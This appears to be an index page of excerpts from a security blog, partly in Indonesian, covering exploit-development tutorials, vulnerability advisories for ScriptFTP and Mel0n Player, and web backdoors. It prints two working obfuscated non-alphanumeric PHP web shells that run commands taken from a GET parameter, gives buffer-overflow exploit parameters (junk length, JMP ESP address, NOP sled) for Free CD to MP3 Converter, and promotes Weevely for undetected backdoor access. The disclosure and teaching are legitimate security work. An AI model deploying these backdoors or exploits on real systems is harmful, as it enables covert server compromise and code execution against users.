Beberapa waktu yang lalu saya udah memberikan tutorial basic exploit development (direct return technique) dan exploit development berbasis SEH. Sekarang mari kita porting exploit tersebut ke Metasploit Framework agar exploit tersebut semakin reliable dan bisa menggunakan macam-macam payload, fitur-fitur canggih yang ada di Metasploit.

Kita akan meng-konversi exploit yang pertama, yaitu Free CD to MP3 Converter. Sebelum itu, kita kumpulkan poin-poin penting yang membuat exploit tersebut berjalan dengan baik, seperti berikut:

junk = "\x41" * 4112                   # jumlah sampah yang dikirim
eip = "\x91\x3b\x43\x00"               # 0x00463b91 FFE4 JMP ESP at cdextract.exe
nops = "\x90" * 16
espdata = "\x90" * (5000 - len(junk+eip+nops)

Dulu saya melakukan proses exploit Free CD to MP3 Converter pada sistem Windows XP SP3 versi NIST FDCC (Federal Desktop Core Configuration), tapi kali ini saya melakukannya pada sistem Windows XP SP3 versi umum, seharusnya ini tidak akan menjadi masalah berarti karena alamat JMP ESP yang saya gunakan kali ini berasal dari module cdextract.exe.

Read More >>

After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor.

<?
$_="{"; #XOR char
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

well, it’s a quite simple program, it’s just a XOR function over strings. By XOR-ing “<>/” with “{” we have “GET” string as the result.
put the result in one-liner code execution and done.

Another version with “<pre>” tag.

<?
$_="{"; #XOR char
$__=($_^"+").($_^")").($_^">"); #XOR = PRE
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?="<".$__.">".${'_'.$_}["_"](${'_'.$_}["__"]);?>

ScriptFTP client is vulnerable against remote buffer overflow vulnerability. The condition is triggered while processing LIST  FTP command with excessive length.

The vulnerability is confirmed in version 3.3. Other version may also be affected.

Software Description

ScriptFTP is a FTP client designed to automate file transfers. It follows the commands written on a text file (also called script file) and makes the uploads or downloads automatically. Writing the script file is very easy, take a look at the script samples section.

Crash/Exploit Information

ScriptFTP follows the commands written on a text file (also called script file). Specifically, processing ScriptFTP with text file/script file contains command GETLIST or GETFILE  of 3000 or more bytes of data may trigger an exception within the client, causing it to crash and lead us to stack overflow.

Proof of Concept

See the POC here and the script to generate ScriptFTP script here. Or if you were too lazy to generate the script, I already prepared it for you, just change the IP address.

Fix and Update

Vendor contacted and responded immediately after our first contact. They are planning to major rewrite but until now, no further info received from them. Do not connect to untrusted FTP server. Fix or update is not available yet, we will update this post if the vendor fix the bug.

Vendor Contact Log:
01/21/2011: Bug found
01/22/2011: Vendor contacted
01/24/2011: Vendor replied
03/07/2011: Update status to vendor
04/06/2011: Vendor received POC
05/17/2011: No further info, 1st reminder sent.
09/11/2011: No further info, 2nd reminder sent.
09/20/2011: No response, advisory released.

POC Video

Kali ini saya akan coba tehnik lain dari stack overflow, yaitu stack overflow berbasis SEH. Apa itu SEH? silakan dibaca diliteratur-literatur berikut:

1. Structured Exception Handling
2. Win32 Exception handling for assembler programmers

Tidak ada yang lebih menyenangkan daripada belajar sambil mencoba
Kita akan mencoba SEH based stack overflow pada program yang pernah di post oleh sickness, yaitu Elecard AVC_HD/MPEG Player. Program Elecard AVC_HD/MPEG Player versi 5.7 menderita buffer overflow ketika mencoba load file .m3u yang ditambahkan sejumlah karakter. Percobaan ini akan dilakukan pada sistem Windows XP SP3 dan menggunakan program seperti pada exploit yang sickness gunakan, jadi silakan download dulu programnya:

Download Elecard AVC_HD/MPEG Player (via ExploitDB)

Saya berasumsi bahwa teman-teman sudah membaca tulisan saya sebelumnya Exploit Development: Basic Stack-based Overflow sehingga sudah tahu apa yang perlu dipersiapkan. Secara teori, SEH based overflow memerlukan trik khusus karena kita berhadapan dengan Exception Handling. Ketika program crash (karena buffer overflow), EIP tidak langsung tertimpa dengan buffer/junk yang kita kirim, tapi mengarahkan kita ke exception handling. Kita hanya perlu memastikan bahwa alamat SE Handler juga tertimpa dengan buffer yang kita kirimkan, sehingga ketika exception handling diteruskan, maka akan membawa kita ke EIP. Kedengarannya sangat rumit, tapi tenang, semuanya akan terlihat lebih mudah apabila kita mencoba langsung

Read More >>

Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files

Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5, and take a look on the orange char ):

Read More >>

Software Description
Mel0n Player is a famous software in Indonesia to play songs that are provided by the Melon portal (http://www.melon.co.id). This software can play any music file types such as mp3, wav, wma, mp4, and others. This player can also play the files on your local computer or by online streaming to the portal Melon. The songs can also be downloaded to your local computer.

Vulnerable Information
The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file as part of skin template. This file will bring the program information and can be accessed on the menu (Menu → Information)), as a result of adding extra bytes to parts of the file (Text section), giving the attackers possibility to run an arbitrary code execution on the system that install Melon Player.

This is just the POC, it will just crash the program.. and it’s in unicode format

Read More >>